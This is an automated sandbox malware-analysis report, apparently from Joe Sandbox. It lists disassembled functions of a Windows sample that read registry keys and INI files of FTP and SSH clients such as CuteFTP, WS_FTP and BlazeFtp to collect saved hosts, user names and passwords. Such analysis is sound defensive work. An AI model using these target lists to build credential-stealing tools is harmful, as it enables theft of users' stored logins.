RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D580

Strings

Password, xrefs: 0040D3B1
ServerName, xrefs: 0040D3CC
UserID, xrefs: 0040D3E7
PortNumber, xrefs: 0040D407
ServerType, xrefs: 0040D468
InitialDirectory, xrefs: 0040D44D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
API String ID: 1332880857-2649023343
Opcode ID: 766aa626b9903119c8621182e70c04737db009e928439351e39ec2ae9a2bac56
Instruction ID: f73558341e8cd2c5acad615dfd7d92bae14253773d7b8338392588a4a47acccd
Opcode Fuzzy Hash: 766aa626b9903119c8621182e70c04737db009e928439351e39ec2ae9a2bac56
Instruction Fuzzy Hash: D651C871800118BADF226F91CC06BED7AB5BF04308F14C0BAB558740B1DB7A9B95AF99

Function 00407E82 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407E95
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407EC9
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004080DF

Strings

PortNumber, xrefs: 00407F72
RemoteDirectory, xrefs: 00407F52
HostName, xrefs: 00407F1C
FSProtocol, xrefs: 00407FC0
Password, xrefs: 00407F01
UserName, xrefs: 00407F37

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
API String ID: 1332880857-3874328862
Opcode ID: 4e5f78b2082b0df1f2a02e6e644a2ec2b3394e2487fed211b8fb3d75f7ba774b
Instruction ID: d0f0f541ce44a27d8796f329589563cdb95c9df658d4ce2de4cac1fa5343e9e1
Opcode Fuzzy Hash: 4e5f78b2082b0df1f2a02e6e644a2ec2b3394e2487fed211b8fb3d75f7ba774b
Instruction Fuzzy Hash: 6D51C67180011CFADF22AB51CC06BDD7AB6BF44308F14C0BAB598750B1DF7A5A95AF89

Function 0040DF20 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DF33
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DF67
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040E150

Strings

FTP destination password, xrefs: 0040DFD5
FTP destination port, xrefs: 0040DFF5
FTP destination catalog, xrefs: 0040E010
FTP destination server, xrefs: 0040DF9F
FTP destination user, xrefs: 0040DFBA
FTP profiles, xrefs: 0040E030

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
API String ID: 1332880857-3620412361
Opcode ID: 285791bbc88e02000cb6d85d213c2cf2028e8e33a0b3a487e299f7c316149c85
Instruction ID: 0971a7c872fb0693c5352b9beac7b9fcdfa7a29398fb9dbefc689de0d8f0c08f
Opcode Fuzzy Hash: 285791bbc88e02000cb6d85d213c2cf2028e8e33a0b3a487e299f7c316149c85
Instruction Fuzzy Hash: 8751B93185011DBADF226F51CC02BDDBAB6BF44304F1484BAB558740B1DF7A9AA1AF88

Function 004081D4 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004081E7
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040821B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004083E3

Strings

UserName, xrefs: 0040828E
PassWord, xrefs: 00408258
RootDirectory, xrefs: 004082A9
ServerType, xrefs: 004082DF
Port, xrefs: 004082C4
Url, xrefs: 00408273

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
API String ID: 1332880857-2128033141
Opcode ID: dab09581dcfefb29672388104fe7817e5414d593983262a8496b057c53f27703
Instruction ID: 6c51b123a90b80f2dcde880b9d7171a883e88705c8f9c7313780505028fc2e87
Opcode Fuzzy Hash: dab09581dcfefb29672388104fe7817e5414d593983262a8496b057c53f27703
Instruction Fuzzy Hash: C751843184011CFADF226F51CC02BDD7AB6BF44708F14C4BAB598740B1DE7A5AA1AF88

Function 0040272A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 00402745
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 0040275E
RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040276B
GetTempPathA.KERNEL32(00000104,?), ref: 00402784
CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 004027A5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402800
CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 0040281E
DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 0040282D

Strings

Software\WinRAR, xrefs: 0040273A

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
String ID: Software\WinRAR
API String ID: 3443402316-224198155
Opcode ID: a05c4e0d96055550b35b99da67906f9fc971332be1f0c5d0b8d6447f5b377a02
Instruction ID: 048e6e6c718a24855db50cc86f6cfa04439d261174973b6e479fa67db8ac738a
Opcode Fuzzy Hash: a05c4e0d96055550b35b99da67906f9fc971332be1f0c5d0b8d6447f5b377a02
Instruction Fuzzy Hash: AC213076A4020CBADF21AAA0DD46FDE7A79AB24748F004076B614B50E1D6F99BD09B18

Function 0040ECC5 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040ECE8
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040ED1C
GetPrivateProfileStringA.KERNEL32(Program,DataPath,004141D6,?,00000104,00000000), ref: 0040EDA2
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EDFB

Strings

DataPath, xrefs: 0040ED98
\PocoSystem.ini, xrefs: 0040ED76
Program, xrefs: 0040ED9D
accounts.ini, xrefs: 0040EDB1
Path, xrefs: 0040ED54

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: AllocCloseEnumLocalOpenPrivateProfileString
String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
API String ID: 1343824468-2495907966
Opcode ID: fbbdc39985ca6559bf2103e34e327bb4f1fea2f35acf94150543e805c75ad6b2
Instruction ID: d8426f1a6225f8b3ccd3b7369ce0e365b958f571d9854067f3528b96b9e63fdd
Opcode Fuzzy Hash: fbbdc39985ca6559bf2103e34e327bb4f1fea2f35acf94150543e805c75ad6b2
Instruction Fuzzy Hash: 46310B7194021DBADF11AB51CC02FDE7AB9BF00308F1084BBB554750E1DEB95AE1AF98

Function 004052E0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405304

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004141D6,?,00000104,?), ref: 00405354
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004141D6,?,00000104,?), ref: 0040538F

Strings

\win.ini, xrefs: 0040531C
WS_FTP, xrefs: 0040534F, 0040538A
DIR, xrefs: 0040534A
\Ipswitch\WS_FTP, xrefs: 004053BF
\Ipswitch, xrefs: 004053DB, 004053EA, 004053F9
DEFDIR, xrefs: 00405385

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
API String ID: 2508676433-45949541
Opcode ID: fd10845315201511baa03f0017f505fcc965452a29e01cd3687e276b7ce8d0c1
Instruction ID: 2f23723e329246ea37d19654ce7cddf11adee987441df0948eeec31433b87cf3
Opcode Fuzzy Hash: fd10845315201511baa03f0017f505fcc965452a29e01cd3687e276b7ce8d0c1
Instruction Fuzzy Hash: 88212171A806087ADF11BA61CC03FDE3669EF64744F10047B7A18B91E2D6FD9AD09E9C

Function 00405658 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 72COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00542E18,CUTEFTP), ref: 0040567F

Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 004056E9
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405710
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 004056DC
CUTEFTP, xrefs: 00405679
Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 0040572A
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 0040571D
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 00405703
\sm.dat, xrefs: 00405693
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 004056F6

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
API String ID: 1884169789-3073816274
Opcode ID: 85eb28852d51ee137f4f876bcd3b437eb6ae76eb9c8a67fe3c9e0e4e760741da
Instruction ID: 434a8bea75bcba08ad3bdf35e8b430fc32f87f05985e1beab70928cc1f6d5057
Opcode Fuzzy Hash: 85eb28852d51ee137f4f876bcd3b437eb6ae76eb9c8a67fe3c9e0e4e760741da
Instruction Fuzzy Hash: F62118746415087ADB112F21DD02FDE3E26EF54749F54803AB508B90E2DBBE8AE19A8C

Function 004066C9 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004066DF
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406713
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406921

Strings

Host, xrefs: 00406763
PthR, xrefs: 0040679F
SSH, xrefs: 00406810
Port, xrefs: 004067C2
User, xrefs: 00406781

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Port$PthR$SSH$User
API String ID: 1332880857-1643752846
Opcode ID: f262ccb685c1f36001bbccbf0626a0d0b5a134f2f977915f3876c6ced4bb526d
Instruction ID: 05b75843c333f4404470ef5bf35d0ab6282f0fbda506d4f24309e253ca2b8762
Opcode Fuzzy Hash: f262ccb685c1f36001bbccbf0626a0d0b5a134f2f977915f3876c6ced4bb526d
Instruction Fuzzy Hash: E5512732800118FADF226B50CC02BDD7AB5BF44308F11C0BAB554740B1DF7A5AE2AF98

Function 00406218 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040622E
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406262
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040640E

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

UserName, xrefs: 004062D6
Password, xrefs: 0040629A
RemoteDir, xrefs: 004062F4
HostAdrs, xrefs: 004062B8
Port, xrefs: 00406317

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: HostAdrs$Password$Port$RemoteDir$UserName
API String ID: 3369285772-3748300950
Opcode ID: ea9a0f43d5a5970f8489b364bd0e91d9156c542d7e55169b215682ce1dcdf491
Instruction ID: 659131148aa89f92dc2af5d7e5fa8bd9fb4cbf4e24194177433c4f875aa0c321
Opcode Fuzzy Hash: ea9a0f43d5a5970f8489b364bd0e91d9156c542d7e55169b215682ce1dcdf491
Instruction Fuzzy Hash: A7411931800118FADF226B51CC02BDD7ABABF44308F15C0BBB554750B1DB7A5AE6AF98

Function 00407448 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040745B
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040748F
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407621

Strings

Directory, xrefs: 00407533
Password, xrefs: 004074C7
_Password, xrefs: 004074E2
Server, xrefs: 004074FD
UserName, xrefs: 00407518

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Directory$Password$Server$UserName$_Password
API String ID: 1332880857-3317168126
Opcode ID: 10d0919ea7a27d91820df6147c937eed1a506e9a9e46d470f2f0eb0f3233723b
Instruction ID: 4f5650318535d5f6d1375e9c3d43e9296c133cf8e28e3780f1e4dd1ce6eb641c
Opcode Fuzzy Hash: 10d0919ea7a27d91820df6147c937eed1a506e9a9e46d470f2f0eb0f3233723b
Instruction Fuzzy Hash: D341C73185021CBADF226F51CC02BDD7AB6BF44308F14C4BAB558750B1DB7A5BA1AF89

Function 0040DCB8 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DCCB
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCFF
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE93

Strings

PortNumber, xrefs: 0040DD8D
HostName, xrefs: 0040DD37
UserName, xrefs: 0040DD52
TerminalType, xrefs: 0040DDA8
Password, xrefs: 0040DD6D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$PortNumber$TerminalType$UserName
API String ID: 1332880857-1017491782
Opcode ID: c43f1d90e4887b0af196a567718d2be2001fb2e678ee16e351542723792f9939
Instruction ID: 7a1adc70422084839155d7d8ad19170be227c19b2048ea9f3bb5b258fe072799
Opcode Fuzzy Hash: c43f1d90e4887b0af196a567718d2be2001fb2e678ee16e351542723792f9939
Instruction Fuzzy Hash: C941BA31910118BADF626F91CC02BDD7AB6BF04304F1084BAB558740B1DF7A9AA5AFC8

Function 00407673 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407686
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004076BA
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040784C

Strings

_FtpPassword, xrefs: 0040770D
FtpDirectory, xrefs: 0040775E
FtpUserName, xrefs: 00407743
FtpServer, xrefs: 00407728
FtpPassword, xrefs: 004076F2

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
API String ID: 1332880857-980612798
Opcode ID: f036d2a4b70bf2c83cef8162802ec2a3813d7afb5a23d2c589f4d7b709d46e09
Instruction ID: 7fd49fa6dd1ba017d1e65fcc213092edd53ce26c958e1ff1ff116aff25b23559
Opcode Fuzzy Hash: f036d2a4b70bf2c83cef8162802ec2a3813d7afb5a23d2c589f4d7b709d46e09
Instruction Fuzzy Hash: D641B93184421CBADF226F51CC02BDD7AB6BF44308F14C4BAB558750B1DB7A6AD1AF89

Function 004064B0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004064C6
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004064FA
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040668F

Strings

Port, xrefs: 0040656E
HostDirName, xrefs: 004065AA
HostName, xrefs: 00406550
Username, xrefs: 0040658C
Password, xrefs: 00406532

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostDirName$HostName$Password$Port$Username
API String ID: 1332880857-791697221
Opcode ID: f2327fd69b61082d22dc8b96d52e98a2777f97c9e20f268e4d59f120f848cbf8
Instruction ID: d74ba574a7403947e9da4afaf0816161fc1f6544ea8ec8891c99de68f7f5397d
Opcode Fuzzy Hash: f2327fd69b61082d22dc8b96d52e98a2777f97c9e20f268e4d59f120f848cbf8
Instruction Fuzzy Hash: 2A41CA31840118FADF226B51CC06BDD7AB6BF44308F15C4BAB554740B1DF7A5AE2AF98

Function 0040D87E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040D894
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D8C8
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040DA4B

Strings

Port, xrefs: 0040D95A
Pass, xrefs: 0040D93C
User, xrefs: 0040D91E
Remote Dir, xrefs: 0040D978
Host, xrefs: 0040D900

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Pass$Port$Remote Dir$User
API String ID: 1332880857-1775099961
Opcode ID: 3fe09a3da9aced8f76b67c3d01656c318c349a614dede48044dd2060b2724a01
Instruction ID: 1b56fd96a8bc7484c712172b162c79db69b0935e68cb7cc8b1d1ed471d885e34
Opcode Fuzzy Hash: 3fe09a3da9aced8f76b67c3d01656c318c349a614dede48044dd2060b2724a01
Instruction Fuzzy Hash: 9641CB31940119BADF227B91CC02BDD7AB6BF44308F14C0BAB558740B1DB7A5A96AF98

Function 0040CAE1 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00542E18,BlazeFtp), ref: 0040CB08

Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

\BlazeFtp, xrefs: 0040CB53
LastPassword, xrefs: 0040CB62
LastAddress, xrefs: 0040CB7C
LastPort, xrefs: 0040CBB2
LastUser, xrefs: 0040CB96
Software\FlashPeak\BlazeFtp\Settings, xrefs: 0040CB67, 0040CB81, 0040CB9B, 0040CBB7
BlazeFtp, xrefs: 0040CB02
site.dat, xrefs: 0040CB23, 0040CB4E

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
